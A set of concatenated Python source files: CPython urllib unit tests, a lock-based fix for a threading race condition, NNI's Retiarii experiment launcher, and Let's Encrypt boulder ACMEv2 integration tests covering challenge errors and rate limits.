"using dict as input type")
def test_using_sequence(self):
# Test passing in a sequence of two-item sequences as an argument.
self.help_inputtype([('1st', '1'), ('2nd', '2'), ('3rd', '3')],
"using sequence of two-item tuples as input")
def test_quoting(self):
# Make sure keys and values are quoted using quote_plus()
given = {"&":"="}
expect = "%s=%s" % (hexescape('&'), hexescape('='))
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
given = {"key name":"A bunch of pluses"}
expect = "key+name=A+bunch+of+pluses"
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
def test_doseq(self):
# Test that passing True for 'doseq' parameter works correctly
given = {'sequence':['1', '2', '3']}
expect = "sequence=%s" % urllib.parse.quote_plus(str(['1', '2', '3']))
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
result = urllib.parse.urlencode(given, True)
for value in given["sequence"]:
expect = "sequence=%s" % value
self.assertIn(expect, result)
self.assertEqual(result.count('&'), 2,
"Expected 2 '&'s, got %s" % result.count('&'))
def test_empty_sequence(self):
self.assertEqual("", urllib.parse.urlencode({}))
self.assertEqual("", urllib.parse.urlencode([]))
def test_nonstring_values(self):
self.assertEqual("a=1", urllib.parse.urlencode({"a": 1}))
self.assertEqual("a=None", urllib.parse.urlencode({"a": None}))
def test_nonstring_seq_values(self):
self.assertEqual("a=1&a=2", urllib.parse.urlencode({"a": [1, 2]}, True))
self.assertEqual("a=None&a=a",
urllib.parse.urlencode({"a": [None, "a"]}, True))
data = collections.OrderedDict([("a", 1), ("b", 1)])
self.assertEqual("a=a&a=b",
urllib.parse.urlencode({"a": data}, True))
def test_urlencode_encoding(self):
# ASCII encoding. Expect %3F with errors="replace"
given = (('\u00a0', '\u00c1'),)
expect = '%3F=%3F'
result = urllib.parse.urlencode(given, encoding="ASCII", errors="replace")
self.assertEqual(expect, result)
# Default is UTF-8 encoding.
given = (('\u00a0', '\u00c1'),)
expect = '%C2%A0=%C3%81'
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
# Latin-1 encoding.
given = (('\u00a0', '\u00c1'),)
expect = '%A0=%C1'
result = urllib.parse.urlencode(given, encoding="latin-1")
self.assertEqual(expect, result)
def test_urlencode_encoding_doseq(self):
# ASCII encoding. Expect %3F with errors="replace"
given = (('\u00a0', '\u00c1'),)
expect = '%3F=%3F'
result = urllib.parse.urlencode(given, doseq=True,
encoding="ASCII", errors="replace")
self.assertEqual(expect, result)
# ASCII Encoding. On a sequence of values.
given = (("\u00a0", (1, "\u00c1")),)
expect = '%3F=1&%3F=%3F'
result = urllib.parse.urlencode(given, True,
encoding="ASCII", errors="replace")
self.assertEqual(expect, result)
# UTF-8
given = (("\u00a0", "\u00c1"),)
expect = '%C2%A0=%C3%81'
result = urllib.parse.urlencode(given, True)
self.assertEqual(expect, result)
given = (("\u00a0", (42, "\u00c1")),)
expect = '%C2%A0=42&%C2%A0=%C3%81'
result = urllib.parse.urlencode(given, True)
self.assertEqual(expect, result)
# latin-1
given = (("\u00a0", "\u00c1"),)
expect = '%A0=%C1'
result = urllib.parse.urlencode(given, True, encoding="latin-1")
self.assertEqual(expect, result)
given = (("\u00a0", (42, "\u00c1")),)
expect = '%A0=42&%A0=%C1'
result = urllib.parse.urlencode(given, True, encoding="latin-1")
self.assertEqual(expect, result)
def test_urlencode_bytes(self):
given = ((b'\xa0\x24', b'\xc1\x24'),)
expect = '%A0%24=%C1%24'
result = urllib.parse.urlencode(given)
self.assertEqual(expect, result)
result = urllib.parse.urlencode(given, True)
self.assertEqual(expect, result)
# Sequence of values
given = ((b'\xa0\x24', (42, b'\xc1\x24')),)
expect = '%A0%24=42&%A0%24=%C1%24'
result = urllib.parse.urlencode(given, True)
self.assertEqual(expect, result)
def test_urlencode_encoding_safe_parameter(self):
# Send '$' (\x24) as safe character
# Default utf-8 encoding
given = ((b'\xa0\x24', b'\xc1\x24'),)
result = urllib.parse.urlencode(given, safe=":$")
expect = '%A0$=%C1$'
self.assertEqual(expect, result)
given = ((b'\xa0\x24', b'\xc1\x24'),)
result = urllib.parse.urlencode(given, doseq=True, safe=":$")
expect = '%A0$=%C1$'
self.assertEqual(expect, result)
# Safe parameter in sequence
given = ((b'\xa0\x24', (b'\xc1\x24', 0xd, 42)),)
expect = '%A0$=%C1$&%A0$=13&%A0$=42'
result = urllib.parse.urlencode(given, True, safe=":$")
self.assertEqual(expect, result)
# Test all above in latin-1 encoding
given = ((b'\xa0\x24', b'\xc1\x24'),)
result = urllib.parse.urlencode(given, safe=":$",
encoding="latin-1")
expect = '%A0$=%C1$'
self.assertEqual(expect, result)
given = ((b'\xa0\x24', b'\xc1\x24'),)
expect = '%A0$=%C1$'
result = urllib.parse.urlencode(given, doseq=True, safe=":$",
encoding="latin-1")
given = ((b'\xa0\x24', (b'\xc1\x24', 0xd, 42)),)
expect = '%A0$=%C1$&%A0$=13&%A0$=42'
result = urllib.parse.urlencode(given, True, safe=":$",
encoding="latin-1")
self.assertEqual(expect, result)
class Pathname_Tests(unittest.TestCase):
"""Test pathname2url() and url2pathname()"""
def test_basic(self):
# Make sure simple tests pass
expected_path = os.path.join("parts", "of", "a", "path")
expected_url = "parts/of/a/path"
result = urllib.request.pathname2url(expected_path)
self.assertEqual(expected_url, result,
"pathname2url() failed; %s != %s" %
(result, expected_url))
result = urllib.request.url2pathname(expected_url)
self.assertEqual(expected_path, result,
"url2pathame() failed; %s != %s" %
(result, expected_path))
def test_quoting(self):
# Test automatic quoting and unquoting works for pathname2url() and
# url2pathname() respectively
given = os.path.join("needs", "quot=ing", "here")
expect = "needs/%s/here" % urllib.parse.quote("quot=ing")
result = urllib.request.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
expect = given
result = urllib.request.url2pathname(result)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
(expect, result))
given = os.path.join("make sure", "using_quote")
expect = "%s/using_quote" % urllib.parse.quote("make sure")
result = urllib.request.pathname2url(given)
self.assertEqual(expect, result,
"pathname2url() failed; %s != %s" %
(expect, result))
given = "make+sure/using_unquote"
expect = os.path.join("make+sure", "using_unquote")
result = urllib.request.url2pathname(given)
self.assertEqual(expect, result,
"url2pathname() failed; %s != %s" %
(expect, result))
@unittest.skipUnless(sys.platform == 'win32',
'test specific to the urllib.request.url2pathname function.')
def test_ntpath(self):
given = ('/C:/', '///C:/', '/C|//')
expect = 'C:\\'
for url in given:
result = urllib.request.url2pathname(url)
self.assertEqual(expect, result,
'urllib.request.url2pathname() failed; %s != %s' %
(expect, result))
given = '///C|/path'
expect = 'C:\\path'
result = urllib.request.url2pathname(given)
self.assertEqual(expect, result,
'urllib.request.url2pathname() failed; %s != %s' %
(expect, result))
class Utility_Tests(unittest.TestCase):
"""Testcase to test the various utility functions in the urllib."""
def test_thishost(self):
"""Test the urllib.request.thishost utility function returns a tuple"""
self.assertIsInstance(urllib.request.thishost(), tuple)
class URLopener_Tests(unittest.TestCase):
"""Testcase to test the open method of URLopener class."""
def test_quoted_open(self):
class DummyURLopener(urllib.request.URLopener):
def open_spam(self, url):
return url
with support.check_warnings(
('DummyURLopener style of invoking requests is deprecated.',
DeprecationWarning)):
self.assertEqual(DummyURLopener().open(
'spam://example/ /'),'//example/%20/')
# test the safe characters are not quoted by urlopen
self.assertEqual(DummyURLopener().open(
"spam://c:|windows%/:=&?~#+!$,;'@()*[]|/path/"),
"//c:|windows%/:=&?~#+!$,;'@()*[]|/path/")
# The FTP wrapper tests below are commented out.
# Can't really tell why they keep failing on Windows and SPARC.
# Everywhere else they work fine, but on those machines they sometimes
# fail in one of the tests, sometimes in another. On Linux the tests
# pass.
# If anybody has one of the problematic environments, please help!
# . Facundo
#
# def server(evt):
# import socket, time
# serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# serv.settimeout(3)
# serv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# serv.bind(("", 9093))
# serv.listen()
# try:
# conn, addr = serv.accept()
# conn.send("1 Hola mundo\n")
# cantdata = 0
# while cantdata < 13:
# data = conn.recv(13-cantdata)
# cantdata += len(data)
# time.sleep(.3)
# conn.send("2 No more lines\n")
# conn.close()
# except socket.timeout:
# pass
# finally:
# serv.close()
# evt.set()
#
# class FTPWrapperTests(unittest.TestCase):
#
# def setUp(self):
# import ftplib, time, threading
# ftplib.FTP.port = 9093
# self.evt = threading.Event()
# threading.Thread(target=server, args=(self.evt,)).start()
# time.sleep(.1)
#
# def tearDown(self):
# self.evt.wait()
#
# def testBasic(self):
# # connects
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# ftp.close()
#
# def testTimeoutNone(self):
# # global default timeout is ignored
# import socket
# self.assertIsNone(socket.getdefaulttimeout())
# socket.setdefaulttimeout(30)
# try:
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# finally:
# socket.setdefaulttimeout(None)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
#
# def testTimeoutDefault(self):
# # global default timeout is used
# import socket
# self.assertIsNone(socket.getdefaulttimeout())
# socket.setdefaulttimeout(30)
# try:
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [])
# finally:
# socket.setdefaulttimeout(None)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
#
# def testTimeoutValue(self):
# ftp = urllib.ftpwrapper("myuser", "mypass", "localhost", 9093, [],
# timeout=30)
# self.assertEqual(ftp.ftp.sock.gettimeout(), 30)
# ftp.close()
class RequestTests(unittest.TestCase):
"""Unit tests for urllib.request.Request."""
def test_default_values(self):
Request = urllib.request.Request
request = Request("http://www.python.org")
self.assertEqual(request.get_method(), 'GET')
request = Request("http://www.python.org", {})
self.assertEqual(request.get_method(), 'POST')
def test_with_method_arg(self):
Request = urllib.request.Request
request = Request("http://www.python.org", method='HEAD')
self.assertEqual(request.method, 'HEAD')
self.assertEqual(request.get_method(), 'HEAD')
request = Request("http://www.python.org", {}, method='HEAD')
self.assertEqual(request.method, 'HEAD')
self.assertEqual(request.get_method(), 'HEAD')
request = Request("http://www.python.org", method='GET')
self.assertEqual(request.get_method(), 'GET')
request.method = 'HEAD'
self.assertEqual(request.get_method(), 'HEAD')
class URL2PathNameTests(unittest.TestCase):
def test_converting_drive_letter(self):
self.assertEqual(url2pathname("///C|"), 'C:')
self.assertEqual(url2pathname("///C:"), 'C:')
self.assertEqual(url2pathname("///C|/"), 'C:\\')
def test_converting_when_no_drive_letter(self):
# cannot end a raw string in \
self.assertEqual(url2pathname("///C/test/"), r'\\\C\test' '\\')
self.assertEqual(url2pathname("////C/test/"), r'\\C\test' '\\')
def test_simple_compare(self):
self.assertEqual(url2pathname("///C|/foo/bar/spam.foo"),
r'C:\foo\bar\spam.foo')
def test_non_ascii_drive_letter(self):
self.assertRaises(IOError, url2pathname, "///\u00e8|/")
def test_roundtrip_url2pathname(self):
list_of_paths = ['C:',
r'\\\C\test\\',
r'C:\foo\bar\spam.foo'
]
for path in list_of_paths:
self.assertEqual(url2pathname(pathname2url(path)), path)
class PathName2URLTests(unittest.TestCase):
def test_converting_drive_letter(self):
self.assertEqual(pathname2url("C:"), '///C:')
self.assertEqual(pathname2url("C:\\"), '///C:')
def test_converting_when_no_drive_letter(self):
self.assertEqual(pathname2url(r"\\\folder\test" "\\"),
'/////folder/test/')
self.assertEqual(pathname2url(r"\\folder\test" "\\"),
'////folder/test/')
self.assertEqual(pathname2url(r"\folder\test" "\\"),
'/folder/test/')
def test_simple_compare(self):
self.assertEqual(pathname2url(r'C:\foo\bar\spam.foo'),
"///C:/foo/bar/spam.foo" )
def test_long_drive_letter(self):
self.assertRaises(IOError, pathname2url, "XX:\\")
def test_roundtrip_pathname2url(self):
list_of_paths = ['///C:',
'/////folder/test/',
'///C:/foo/bar/spam.foo']
for path in list_of_paths:
self.assertEqual(pathname2url(url2pathname(path)), path)
if __name__ == '__main__':
unittest.main()
|
multiThreadingRaceConditionSolution.py
|
import threading
# global variable x
x = 0
def increment():
"""
function to increment global variable x
"""
global x
x += 1
def thread_task(lock):
"""
task for thread
calls increment function 100000 times.
"""
for _ in range(100000):
lock.acquire()
increment()
lock.release()
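# Note (added illustration, not in the original): the explicit acquire/release
# pair above can equivalently be written with the lock as a context manager,
# which also releases the lock if increment() raises:
#     with lock:
#         increment()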
def main_task():
global x
# setting global variable x as 0
x = 0
# creating a lock
lock = threading.Lock()
# creating threads
t1 = threading.Thread(target=thread_task, args=(lock,))
t2 = threading.Thread(target=thread_task, args=(lock,))
# start threads
t1.start()
t2.start()
# wait until threads finish their job
t1.join()
t2.join()
if __name__ == "__main__":
for i in range(10):
main_task()
print("Iteration {0}: x = {1}".format(i,x))
|
pytorch.py
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import atexit
import logging
import os
import socket
import time
from dataclasses import dataclass
from pathlib import Path
from subprocess import Popen
from threading import Thread
from typing import Any, List, Optional, Union
import colorama
import psutil
import torch
import torch.nn as nn
import nni.runtime.log
from nni.common.device import GPUDevice
from nni.experiment import Experiment, TrainingServiceConfig, launcher, management, rest
from nni.experiment.config import util
from nni.experiment.config.base import ConfigBase, PathLike
from nni.experiment.pipe import Pipe
from nni.tools.nnictl.command_utils import kill_command
from ..codegen import model_to_pytorch_script
from ..converter import convert_to_graph
from ..converter.graph_gen import GraphConverterWithShape
from ..execution import list_models, set_execution_engine
from ..execution.python import get_mutation_dict
from ..graph import Evaluator
from ..integration import RetiariiAdvisor
from ..mutator import Mutator
from ..nn.pytorch.mutator import extract_mutation_from_pt_module, process_inline_mutation
from ..oneshot.interface import BaseOneShotTrainer
from ..strategy import BaseStrategy
_logger = logging.getLogger(__name__)
@dataclass(init=False)
class RetiariiExeConfig(ConfigBase):
experiment_name: Optional[str] = None
search_space: Any = '' # TODO: remove
trial_command: str = '_reserved'
trial_code_directory: PathLike = '.'
trial_concurrency: int
trial_gpu_number: int = 0
devices: Optional[List[Union[str, GPUDevice]]] = None
max_experiment_duration: Optional[str] = None
max_trial_number: Optional[int] = None
max_concurrency_cgo: Optional[int] = None
batch_waiting_time: Optional[int] = None
nni_manager_ip: Optional[str] = None
debug: bool = False
log_level: Optional[str] = None
experiment_working_directory: PathLike = '~/nni-experiments'
# remove configuration of tuner/assessor/advisor
training_service: TrainingServiceConfig
execution_engine: str = 'py'
# input used in GraphConverterWithShape. Currently supports shape tuples only.
dummy_input: Optional[List[int]] = None
# input used for benchmark engine.
benchmark: Optional[str] = None
def __init__(self, training_service_platform: Optional[str] = None, **kwargs):
super().__init__(**kwargs)
if training_service_platform is not None:
assert 'training_service' not in kwargs
self.training_service = util.training_service_config_factory(platform=training_service_platform)
self.__dict__['trial_command'] = 'python3 -m nni.retiarii.trial_entry py'
def __setattr__(self, key, value):
fixed_attrs = {'search_space': '',
'trial_command': '_reserved'}
if key in fixed_attrs and fixed_attrs[key] != value:
raise AttributeError(f'{key} is not supposed to be set in Retiarii mode by users!')
# 'trial_code_directory' is handled differently because the path will be converted to absolute path by us
if key == 'trial_code_directory' and not (value == Path('.') or os.path.isabs(value)):
raise AttributeError(f'{key} is not supposed to be set in Retiarii mode by users!')
if key == 'execution_engine':
assert value in ['base', 'py', 'cgo', 'benchmark'], f'The specified execution engine "{value}" is not supported.'
self.__dict__['trial_command'] = 'python3 -m nni.retiarii.trial_entry ' + value
self.__dict__[key] = value
def validate(self, initialized_tuner: bool = False) -> None:
super().validate()
@property
def _canonical_rules(self):
return _canonical_rules
@property
def _validation_rules(self):
return _validation_rules
_canonical_rules = {
'trial_code_directory': util.canonical_path,
'max_experiment_duration': lambda value: f'{util.parse_time(value)}s' if value is not None else None,
'experiment_working_directory': util.canonical_path
}
_validation_rules = {
'trial_code_directory': lambda value: (Path(value).is_dir(), f'"{value}" does not exist or is not directory'),
'trial_concurrency': lambda value: value > 0,
'trial_gpu_number': lambda value: value >= 0,
'max_experiment_duration': lambda value: util.parse_time(value) > 0,
'max_trial_number': lambda value: value > 0,
'log_level': lambda value: value in ["trace", "debug", "info", "warning", "error", "fatal"],
'training_service': lambda value: (type(value) is not TrainingServiceConfig, 'cannot be abstract base class')
}
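# A minimal usage sketch (added for illustration, not part of this module;
# 'local' is assumed here to be a valid training service platform name):
#     exp_config = RetiariiExeConfig('local')
#     exp_config.trial_concurrency = 2
#     exp_config.max_trial_number = 10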
def preprocess_model(base_model, trainer, applied_mutators, full_ir=True, dummy_input=None):
# TODO: this logic might need to be refactored into execution engine
if full_ir:
try:
script_module = torch.jit.script(base_model)
except Exception as e:
_logger.error('Your base model cannot be parsed by torch.jit.script, please fix the following error:')
raise e
if dummy_input is not None:
# FIXME: this is a workaround as full tensor is not supported in configs
dummy_input = torch.randn(*dummy_input)
converter = GraphConverterWithShape()
base_model_ir = convert_to_graph(script_module, base_model, converter, dummy_input=dummy_input)
else:
base_model_ir = convert_to_graph(script_module, base_model)
# handle inline mutations
mutators = process_inline_mutation(base_model_ir)
else:
base_model_ir, mutators = extract_mutation_from_pt_module(base_model)
base_model_ir.evaluator = trainer
if mutators is not None and applied_mutators:
raise RuntimeError('Mixed usage of LayerChoice/InputChoice and mutators is not supported yet, '
'do not use mutators when you use LayerChoice/InputChoice')
if mutators is not None:
applied_mutators = mutators
return base_model_ir, applied_mutators
def debug_mutated_model(base_model, trainer, applied_mutators):
"""
Locally run only one trial without launching an experiment for debugging purposes, then exit.
For example, it can be used to quickly check shape mismatch.
Specifically, it applies mutators (default to choose the first candidate for the choices)
to generate a new model, then run this model locally.
Parameters
----------
base_model : nni.retiarii.nn.pytorch.nn.Module
the base model
trainer : nni.retiarii.evaluator
the training class of the generated models
applied_mutators : list
a list of mutators that will be applied on the base model for generating a new model
"""
base_model_ir, applied_mutators = preprocess_model(base_model, trainer, applied_mutators)
from ..strategy import _LocalDebugStrategy
strategy = _LocalDebugStrategy()
strategy.run(base_model_ir, applied_mutators)
_logger.info('local debug completed!')
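# Hypothetical usage sketch (added for illustration; the model and evaluator
# names below are placeholders, not objects defined in this module):
#     model = MyRetiariiBaseModel()        # an nni.retiarii.nn.pytorch module
#     evaluator = my_evaluator             # any evaluator accepted by preprocess_model
#     debug_mutated_model(model, evaluator, applied_mutators=[])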
class RetiariiExperiment(Experiment):
def __init__(self, base_model: nn.Module, trainer: Union[Evaluator, BaseOneShotTrainer],
applied_mutators: List[Mutator] = None, strategy: BaseStrategy = None):
# TODO: The current design of init interface of Retiarii experiment needs to be reviewed.
self.config: RetiariiExeConfig = None
self.port: Optional[int] = None
self.base_model = base_model
self.trainer = trainer
self.applied_mutators = applied_mutators
self.strategy = strategy
self._dispatcher = RetiariiAdvisor()
self._dispatcher_thread: Optional[Thread] = None
self._proc: Optional[Popen] = None
self._pipe: Optional[Pipe] = None
def _start_strategy(self):
base_model_ir, self.applied_mutators = preprocess_model(
self.base_model, self.trainer, self.applied_mutators,
full_ir=self.config.execution_engine not in ['py', 'benchmark'],
dummy_input=self.config.dummy_input
)
_logger.info('Start strategy...')
self.strategy.run(base_model_ir, self.applied_mutators)
_logger.info('Strategy exit')
# TODO: find out a proper way to show no more trial message on WebUI
# self._dispatcher.mark_experiment_as_ending()
def start(self, port: int = 8080, debug: bool = False) -> None:
"""
Start the experiment in background.
This method will raise an exception on failure.
If it returns, the experiment should have been successfully started.
Parameters
----------
port
The port of web UI.
debug
Whether to start in debug mode.
"""
atexit.register(self.stop)
# we will probably need an execution engine factory to make this clean and elegant
if self.config.execution_engine == 'base':
from ..execution.base import BaseExecutionEngine
engine = BaseExecutionEngine()
elif self.config.execution_engine == 'cgo':
from ..execution.cgo_engine import CGOExecutionEngine
assert self.config.training_service.platform == 'remote', \
"CGO execution engine currently only supports remote training service"
assert self.config.batch_waiting_time is not None
devices = self._construct_devices()
engine = CGOExecutionEngine(devices,
max_concurrency=self.config.max_concurrency_cgo,
batch_waiting_time=self.config.batch_waiting_time)
elif self.config.execution_engine == 'py':
from ..execution.python import PurePythonExecutionEngine
engine = PurePythonExecutionEngine()
elif self.config.execution_engine == 'benchmark':
from ..execution.benchmark import BenchmarkExecutionEngine
engine = BenchmarkExecutionEngine(self.config.benchmark)
set_execution_engine(engine)
self.id = management.generate_experiment_id()
if self.config.experiment_working_directory is not None:
log_dir = Path(self.config.experiment_working_directory, self.id, 'log')
else:
log_dir = Path.home() / f'nni-experiments/{self.id}/log'
nni.runtime.log.start_experiment_log(self.id, log_dir, debug)
self._proc, self._pipe = launcher.start_experiment_retiarii(self.id, self.config, port, debug)
assert self._proc is not None
assert self._pipe is not None
self.port = port # port will be None if start up failed
# dispatcher must be launched after pipe initialized
# the logic to launch dispatcher in background should be refactored into dispatcher api
self._dispatcher = self._create_dispatcher()
self._dispatcher_thread = Thread(target=self._dispatcher.run)
self._dispatcher_thread.start()
ips = [self.config.nni_manager_ip]
for interfaces in psutil.net_if_addrs().values():
for interface in interfaces:
if interface.family == socket.AF_INET:
ips.append(interface.address)
ips = [f'http://{ip}:{port}' for ip in ips if ip]
msg = 'Web UI URLs: ' + colorama.Fore.CYAN + ' '.join(ips) + colorama.Style.RESET_ALL
_logger.info(msg)
exp_status_checker = Thread(target=self._check_exp_status)
exp_status_checker.start()
self._start_strategy()
# TODO: the experiment should be completed, when strategy exits and there is no running job
_logger.info('Waiting for experiment to become DONE (you can ctrl+c if there are no running trial jobs)...')
exp_status_checker.join()
def _construct_devices(self):
devices = []
if hasattr(self.config.training_service, 'machine_list'):
for machine in self.config.training_service.machine_list:
assert machine.gpu_indices is not None, \
'gpu_indices must be set in RemoteMachineConfig for CGO execution engine'
for gpu_idx in machine.gpu_indices:
devices.append(GPUDevice(machine.host, gpu_idx))
return devices
def _create_dispatcher(self):
return self._dispatcher
def run(self, config: RetiariiExeConfig = None, port: int = 8080, debug: bool = False) -> str:
"""
Run the experiment.
This function will block until the experiment finishes or errors.
"""
if isinstance(self.trainer, BaseOneShotTrainer):
self.trainer.fit()
else:
assert config is not None, 'You are using classic search mode, config cannot be None!'
self.config = config
self.start(port, debug)
def _check_exp_status(self) -> bool:
"""
Poll the experiment status periodically.
This function will block until the experiment finishes or fails.
Return `True` when the experiment is done, or `False` when it failed.
"""
try:
while True:
time.sleep(10)
# this if is to deal with the situation that
# nnimanager is cleaned up by ctrl+c first
if self._proc.poll() is None:
status = self.get_status()
else:
return False
if status == 'DONE' or status == 'STOPPED':
return True
if status == 'ERROR':
return False
except KeyboardInterrupt:
_logger.warning('KeyboardInterrupt detected')
finally:
self.stop()
def stop(self) -> None:
"""
Stop background experiment.
"""
_logger.info('Stopping experiment, please wait...')
atexit.unregister(self.stop)
# stop strategy first
if self._dispatcher_thread is not None:
self._dispatcher.stopping = True
self._dispatcher_thread.join(timeout=1)
if self.id is not None:
nni.runtime.log.stop_experiment_log(self.id)
if self._proc is not None:
try:
# this if is to deal with the situation that
# nnimanager is cleaned up by ctrl+c first
if self._proc.poll() is None:
rest.delete(self.port, '/experiment')
except Exception as e:
_logger.exception(e)
_logger.warning('Cannot gracefully stop experiment, killing NNI process...')
kill_command(self._proc.pid)
if self._pipe is not None:
self._pipe.close()
self.id = None
self.port = None
self._proc = None
self._pipe = None
self._dispatcher = None
self._dispatcher_thread = None
_logger.info('Experiment stopped')
def export_top_models(self, top_k: int = 1, optimize_mode: str = 'maximize', formatter: str = 'dict') -> Any:
"""
Export several top performing models.
For one-shot algorithms, only top-1 is supported. For others, ``optimize_mode`` and ``formatter`` are
available for customization.
Parameters
----------
top_k : int
How many models are intended to be exported.
optimize_mode : str
``maximize`` or ``minimize``. Not supported by one-shot algorithms.
``optimize_mode`` is likely to be removed and defined in strategy in future.
formatter : str
Support ``code`` and ``dict``. Not supported by one-shot algorithms.
If ``code``, the python code of model will be returned.
If ``dict``, the mutation history will be returned.
"""
if formatter == 'code':
assert self.config.execution_engine != 'py', 'You should use `dict` formatter when using Python execution engine.'
if isinstance(self.trainer, BaseOneShotTrainer):
assert top_k == 1, 'Only support top_k is 1 for now.'
return self.trainer.export()
else:
all_models = filter(lambda m: m.metric is not None, list_models())
assert optimize_mode in ['maximize', 'minimize']
all_models = sorted(all_models, key=lambda m: m.metric, reverse=optimize_mode == 'maximize')
assert formatter in ['code', 'dict'], 'Export formatter other than "code" and "dict" is not supported yet.'
if formatter == 'code':
return [model_to_pytorch_script(model) for model in all_models[:top_k]]
elif formatter == 'dict':
return [get_mutation_dict(model) for model in all_models[:top_k]]
def retrain_model(self, model):
"""
This function retrains the exported model and tests it to report test accuracy.
"""
raise NotImplementedError
|
v2_integration.py
|
# -*- coding: utf-8 -*-
"""
Integration test cases for ACMEv2 as implemented by boulder-wfe2.
"""
import subprocess
import requests
import datetime
import time
import os
import json
import re
import OpenSSL
from cryptography import x509
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives import serialization
import chisel2
from helpers import *
from acme import errors as acme_errors
from acme.messages import Status, CertificateRequest, Directory
from acme import crypto_util as acme_crypto_util
from acme import client as acme_client
from acme import messages
from acme import challenges
from acme import errors
import josepy
import tempfile
import shutil
import atexit
import random
import string
import threading
from http.server import HTTPServer, BaseHTTPRequestHandler
import socketserver
import socket
import challtestsrv
challSrv = challtestsrv.ChallTestServer()
def test_multidomain():
chisel2.auth_and_issue([random_domain(), random_domain()])
def test_wildcardmultidomain():
"""
Test issuance for a random domain and a random wildcard domain using DNS-01.
"""
chisel2.auth_and_issue([random_domain(), "*."+random_domain()], chall_type="dns-01")
def test_http_challenge():
chisel2.auth_and_issue([random_domain(), random_domain()], chall_type="http-01")
def rand_http_chall(client):
d = random_domain()
csr_pem = chisel2.make_csr([d])
order = client.new_order(csr_pem)
authzs = order.authorizations
for a in authzs:
for c in a.body.challenges:
if isinstance(c.chall, challenges.HTTP01):
return d, c.chall
raise(Exception("No HTTP-01 challenge found for random domain authz"))
def check_challenge_dns_err(chalType):
"""
check_challenge_dns_err tests that performing an ACME challenge of the
specified type to a hostname that is configured to return SERVFAIL for all
queries produces the correct problem type and detail message.
"""
client = chisel2.make_client()
# Create a random domain.
d = random_domain()
# Configure the chall srv to SERVFAIL all queries for that domain.
challSrv.add_servfail_response(d)
# Expect a DNS problem with a detail that matches a regex
expectedProbType = "dns"
expectedProbRegex = re.compile(r"DNS problem: SERVFAIL looking up (A|AAAA|TXT|CAA) for {0}".format(d))
# Try and issue for the domain with the given challenge type.
failed = False
try:
chisel2.auth_and_issue([d], client=client, chall_type=chalType)
except acme_errors.ValidationError as e:
# Mark that the auth_and_issue failed
failed = True
# Extract the failed challenge from each failed authorization
for authzr in e.failed_authzrs:
c = None
if chalType == "http-01":
c = chisel2.get_chall(authzr, challenges.HTTP01)
elif chalType == "dns-01":
c = chisel2.get_chall(authzr, challenges.DNS01)
elif chalType == "tls-alpn-01":
c = chisel2.get_chall(authzr, challenges.TLSALPN01)
else:
raise(Exception("Invalid challenge type requested: {0}".format(challType)))
# The failed challenge's error should match expected
error = c.error
if error is None or error.typ != "urn:ietf:params:acme:error:{0}".format(expectedProbType):
raise(Exception("Expected {0} prob, got {1}".format(expectedProbType, error.typ)))
if not expectedProbRegex.match(error.detail):
raise(Exception("Prob detail did not match expectedProbRegex, got \"{0}\"".format(error.detail)))
finally:
challSrv.remove_servfail_response(d)
# If there was no exception that means something went wrong. The test should fail.
if failed is False:
raise(Exception("No problem generated issuing for broken DNS identifier"))
def test_http_challenge_dns_err():
"""
test_http_challenge_dns_err tests that a HTTP-01 challenge for a domain
with broken DNS produces the correct problem response.
"""
check_challenge_dns_err("http-01")
def test_dns_challenge_dns_err():
"""
test_dns_challenge_dns_err tests that a DNS-01 challenge for a domain
with broken DNS produces the correct problem response.
"""
check_challenge_dns_err("dns-01")
def test_tls_alpn_challenge_dns_err():
"""
test_tls_alpn_challenge_dns_err tests that a TLS-ALPN-01 challenge for a domain
with broken DNS produces the correct problem response.
"""
check_challenge_dns_err("tls-alpn-01")
def test_http_challenge_broken_redirect():
"""
test_http_challenge_broken_redirect tests that a common webserver
mis-configuration receives the correct specialized error message when attempting
an HTTP-01 challenge.
"""
client = chisel2.make_client()
# Create an authz for a random domain and get its HTTP-01 challenge token
d, chall = rand_http_chall(client)
token = chall.encode("token")
# Create a broken HTTP redirect similar to ones we see frequently "in the wild"
challengePath = "/.well-known/acme-challenge/{0}".format(token)
redirect = "http://{0}.well-known/acme-challenge/bad-bad-bad".format(d)
challSrv.add_http_redirect(
challengePath,
redirect)
# Expect the specialized error message
expectedError = "Fetching {0}: Invalid host in redirect target \"{1}.well-known\". Check webserver config for missing '/' in redirect target.".format(redirect, d)
# NOTE(@cpu): Can't use chisel2.expect_problem here because it doesn't let
# us interrogate the detail message easily.
try:
chisel2.auth_and_issue([d], client=client, chall_type="http-01")
except acme_errors.ValidationError as e:
for authzr in e.failed_authzrs:
c = chisel2.get_chall(authzr, challenges.HTTP01)
error = c.error
if error is None or error.typ != "urn:ietf:params:acme:error:connection":
raise(Exception("Expected connection prob, got %s" % (error.__str__())))
if error.detail != expectedError:
raise(Exception("Expected prob detail %s, got %s" % (expectedError, error.detail)))
challSrv.remove_http_redirect(challengePath)
def test_failed_validation_limit():
"""
Fail a challenge repeatedly for the same domain, with the same account. Once
we reach the rate limit we should get a rateLimitedError. Note that this
depends on the specific threshold configured in rate-limit-policies.yml.
This also incidentally tests a fix for
https://github.com/letsencrypt/boulder/issues/4329. We expect to get
ValidationErrors, eventually followed by a rate limit error.
"""
domain = "fail." + random_domain()
csr_pem = chisel2.make_csr([domain])
client = chisel2.make_client()
threshold = 3
for _ in range(threshold):
order = client.new_order(csr_pem)
chall = order.authorizations[0].body.challenges[0]
client.answer_challenge(chall, chall.response(client.net.key))
try:
client.poll_and_finalize(order)
except errors.ValidationError as e:
pass
